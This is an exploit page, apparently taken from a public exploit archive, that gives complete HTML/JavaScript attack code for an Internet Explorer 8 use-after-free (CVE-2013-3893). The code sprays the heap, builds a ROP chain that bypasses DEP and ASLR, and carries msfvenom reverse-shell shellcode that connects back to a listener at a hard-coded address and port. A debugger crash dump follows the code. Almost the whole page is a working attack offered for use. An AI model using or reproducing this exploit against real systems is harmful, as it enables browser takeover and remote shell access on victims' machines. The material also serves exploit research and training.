扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 |
# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free # Date: 15/05/2021 # CVE : CVE-2013-3893 # PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json # Exploit Author: SlidingWindow # Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN # Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1) # Bypasses: DEP, ASLR using MSVCR71.DLL # Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training <html> <script> var spraychunks = new Array(); // Use BSTR spray since DEPS spray didn't work here function heapspray() { var ropchain = unescape("%u122c%u0c0c"); //EAX now points here. EDX = [EAX+0x70]. So call EDX will take a forward jump to stack-heap flip: 0x7c348b05 :# XCHG EAX,ESP # RETN //ESP points here after stack-heap flip. jump over padding+stack-heap flip into ROP chain. ropchain += unescape("%u6bd5%u7c36");//0x7c366bd5 :# ADD ESP,100 # RETN** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //Some padding ropchain += unescape("%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565"); //ESP will point to 0x0c0c122c after stack-heap flip. ropchain += unescape("%u8b05%u7c34"); //0x7c348b05 :# XCHG EAX,ESP # RETN** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //More padding for ADD ESP, 100 ropchain += unescape("%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565"); //rop chain generated with mona.py - www.corelan.be //ropchain needed a little fix ropchain += unescape( "" + // #[---INFO:gadgets_to_set_ebp:---] : "%u1cab%u7c35" + // 0x7c351cab : ,# POP EBP # RETN [MSVCR71.dll] "%u1cab%u7c35" + // 0x7c351cab : ,# skip 4 bytes [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ebx:---] : "%u728e%u7c34" + // 0x7c34728e : ,# POP EAX # RETN [MSVCR71.dll] "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201 "%u684b%u7c36" + // 0x7c36684b : ,# NEG EAX # RETN [MSVCR71.dll] "%u1695%u7c37" + // 0x7c371695 : ,# POP EBX # RETN [MSVCR71.dll] "%uffff%uffff" + // 0xffffffff : ,# "%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [MSVCR71.dll] "%u2174%u7c35" + // 0x7c352174 : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edx:---] : "%u5937%u7c34" + // 0x7c345937 : ,# POP EDX # RETN [MSVCR71.dll] "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040 "%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ecx:---] : "%u0c81%u7c36" + // 0x7c360c81 : ,# POP ECX # RETN [MSVCR71.dll] "%ucd8c%u7c38" + // 0x7c38cd8c : ,# &Writable location [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edi:---] : "%u4648%u7c35" + // 0x7c354648 : ,# POP EDI # RETN [MSVCR71.dll] "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_esi:---] : "%u50dd%u7c36" + // 0x7c3650dd : ,# POP ESI # RETN [MSVCR71.dll] "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll] "%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll] // "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll] // "%ua051%u7c37" +// 7c37a051 + 0xEF should become0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "%ua151%u7c37"+ // 7c37a151 + + 0xEF should become0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "" + // #[---INFO:pushad:---] : "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] "" + // #[---INFO:extras:---] : "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll] ""); //: // msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.154.130 lport=4444 -b '\x00' -f js_le // First few bytes, %uc481%ufa24%uffff (which is \x81\xc4\x24\xfa\xff\xff # add esp,-1500) move ESP away from EIP to avoid GetPC() routine from corrupting our shellcode var shellcode = unescape("%uc481%ufa24%uffff%uccd9%u74d9%uf424%ube5d%uba98%ue3da%uc931%u52b1%u7531%u8317%u04c5%ued03%u38a9%uf116%u3e26%u09d9%u5fb7%uec53%u5f86%u6507%u6fb8%u2b43%u1b35%udf01%u69ce%ud08e%uc767%udfe8%u7478%u7ec8%u87fb%ua01d%u47c2%ua150%ub503%uf399%ub1dc%ue30c%u8f69%u888c%u0122%u6d95%u20f2%u20b4%u7a88%uc316%uf75d%udb1f%u3282%u50e9%uc870%ub0e8%u3148%ufd46%uc064%u3a96%u3b42%u32ed%uc6b0%u81f6%u1cca%u1172%ud66c%ufd24%u3b8c%u76b2%uf082%ud0b0%u0787%u6b14%u8cb3%ubb9b%ud635%u1fbf%u8c1d%u06de%u63fb%u58de%udca4%u137a%u0849%u7ef7%ufd06%u803a%u69d6%uf34c%u36e4%u9be6%ube44%u5c20%u95aa%uf295%u1655%udbe6%u4291%u73b6%ueb33%u835d%u3ebc%ud3f1%u9112%u83b2%u41d2%uc95b%ubedc%uf27b%ud736%u0916%u18d1%u8b4e%uf1a3%uab8d%u5db2%u4d1b%u4dde%uc64d%uf777%u9cd4%uf8e6%ud9c2%u7229%u1ee1%u73e7%u0c8c%u7390%u6edb%u8b37%u06f1%u1edb%ud69e%u0292%u8109%uf5f3%u4740%uacee%u75fa%u29f3%u3dc4%u8a28%ubccb%ub6bd%uaeef%u367b%u9ab4%u61d3%u7462%udb92%u2ec4%ub74c%ua68e%ufb09%ub010%ud615%u5ce6%u8fa7%u63be%u5808%u1c37%uf874%uf7b8%u083c%u55f3%u8114%u0c5a%ucc24%ufb5c%ue96b%u09de%u0e14%u78fe%u4a11%u91b8%uc36b%u952d%ue4d8%u4167"); var junk = unescape("%u2020%u2020"); while (junk.length < 0x4000) junk += junk; offset = 0x204/2 ; //0c0c1228 var junk_front = junk.substring(0,offset); var junk_end = junk.substring(0,0x800 - junk_front.length - ropchain.length - shellcode.length) var smallblock = junk_front + ropchain + shellcode + junk_end; var largeblock = ""; while (largeblock.length < 0x80000) { largeblock = largeblock + smallblock; } // make allocations for (i = 0; i < 0x450; i++) { spraychunks[i] = largeblock.substring(0, (0x7fb00-6)/2);} } function alloc(nr_alloc){ for (var i=0; i < nr_alloc; i++){ divobj = document.createElement('div'); // Allocate 0x25 (37 decimal) bytes.Vulnerable object size = 0x4c bytes divobj.className = "\u1228\u0c0c\u4141\u4141\u4242\u4242\u4343\u4343\u4444\u4444\u4545\u4545\u4646\u4646" + "\u4747\u4747\u4848\u4949\u4949\u5050\u5050\u5151\u5151\u5252\u5252\u5353\u5353\u5454" + "\u5454\u5555\u5555\u5656\u5656\u5757\u5757\u5858\u5858"; } } heapspray(); function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); heapspray(); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { //Vulnerable Object is freed here document.write(""); //Replace/Reclaim the freed object here. //Object size is 0x4c alloc(0x20); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } window.onload = function() { trigger(); } </script> </html> <!-- Debug: Taking a different code path for this exploit First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000003 ebx=00000100 ecx=40404040 edx=00000001 esi=0089c098 edi=00000000 eip=7467b68d esp=0301c34c ebp=0301c360 iopl=0 nv up ei pl nz na po nc cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010202 mshtml!CElement::Doc: 7467b68d 8b01mov eax,dword ptr [ecx]ds:002b:40404040=???????? 0:005> u eip mshtml!CElement::Doc: 7467b68d 8b01mov eax,dword ptr [ecx] 7467b68f 8b5070mov edx,dword ptr [eax+70h] 7467b692 ffd2calledx 7467b694 8b400cmov eax,dword ptr [eax+0Ch] 7467b697 c3ret 7467b698 90nop 7467b699 90nop 7467b69a 90nop 0:005> ub eip mshtml!CElement::SecurityContext+0x22: 7467b681 8b01mov eax,dword ptr [ecx] 7467b683 8b5070mov edx,dword ptr [eax+70h] 7467b686 ffe2jmp edx 7467b688 90nop 7467b689 90nop 7467b68a 90nop 7467b68b 90nop 7467b68c 90nop |
体验盒子
